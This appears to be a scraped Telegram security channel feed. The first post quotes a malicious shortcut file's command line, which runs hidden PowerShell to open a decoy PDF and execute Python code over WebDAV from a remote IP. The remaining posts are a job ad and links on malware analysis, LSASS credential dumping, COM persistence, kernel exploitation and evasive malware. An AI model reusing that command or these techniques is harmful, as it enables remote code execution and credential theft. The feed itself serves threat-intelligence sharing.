Source Byte
or even run python remotely -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc.lnk
2.9 KB
🔥5👍2
Forwarded from Alee
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] .
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
🔥13👾7❤1⚡1👍1
Source Byte
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] . [ + ] Familiarity with reverse engineering and malware analysis. [ + ]…
Hi
one-thing i forgot to mention :/
these opportunity jobs are CTI & TR at the time and it only available in Tehran
have a nice day 😬
one-thing i forgot to mention :/
these opportunity jobs are CTI & TR at the time and it only available in Tehran
have a nice day 😬
😁5👍1💋1👾1
Hijack the TypeLib. New COM persistence technique
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
❤2🔥2
Agent Tesla Analysis [Part 1: Unpacking]
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/AGENT-TESLA-1/
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/
❤2🔥2👾1
Dark web threats and dark market predictions for 2025
https://securelist.com/ksb-dark-web-predictions-2025/114966/
🤣4👍2❤1🔥1😈1
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations
https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
🔥2🤮2👾2👍1🥱1
1734722992877.pdf
1 MB
Exploring Kernel Callbacks in Windows for Red Teamers / Developers
Forwarded from Infosec Fortress
The Kernel Hacker's Guide to the Galaxy
Automating Exploit Engineering Workflows
H2HC 2024
#binary
#kernel
#exploitation
———
🆔 @Infosec_Fortress
Automating Exploit Engineering Workflows
H2HC 2024
#binary
#kernel
#exploitation
———
🆔 @Infosec_Fortress
👍3
Forwarded from /mdre/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from kerable
LSaasDumper.pdf
2 MB
Докладывал доклад на Offensive Meetup #3
Рассказал про получение секретов из Lsass-a через произвольное чтение физической памяти
Вот преза
Рассказал про получение секретов из Lsass-a через произвольное чтение физической памяти
Вот преза
🔥1
Forwarded from Infosec Fortress
Connor McGarr’s Blog
Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
Dealing with Virtualization-Based Security (VBS), Hypervisor-Protected Code Integrity (HVCI), and Kernel Control Flow Guard (kCFG).
Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
🔗 Link
#binary
#exploitation
#windows
#hvci
———
🆔 @Infosec_Fortress
🔗 Link
#binary
#exploitation
#windows
#hvci
———
🆔 @Infosec_Fortress
👍3🤣1
NanoDump: How I Reinvented SafetyKatz to Dump LSASS with NanoDump
https://xakep.ru/2024/11/13/lsass-nanodump/
https://xakep.ru/2024/11/13/lsass-nanodump/
👍3
Source Byte
WTSRM-SLIDES.pdf
WTSRM - Writing Tiny Small Reliable Malware demo repository for my corresponding talk.
https://github.com/rad9800/WTSRM
Unhooks all Windows Dlls with \KnownDlls\
No CRT dependencies
Small size
Low entropy
Random string encryption key (thus no plaintext strings)
API hashing
Hook detection
Walks around hooks for initial unhooking on ntdll
https://github.com/rad9800/WTSRM
👍3👀2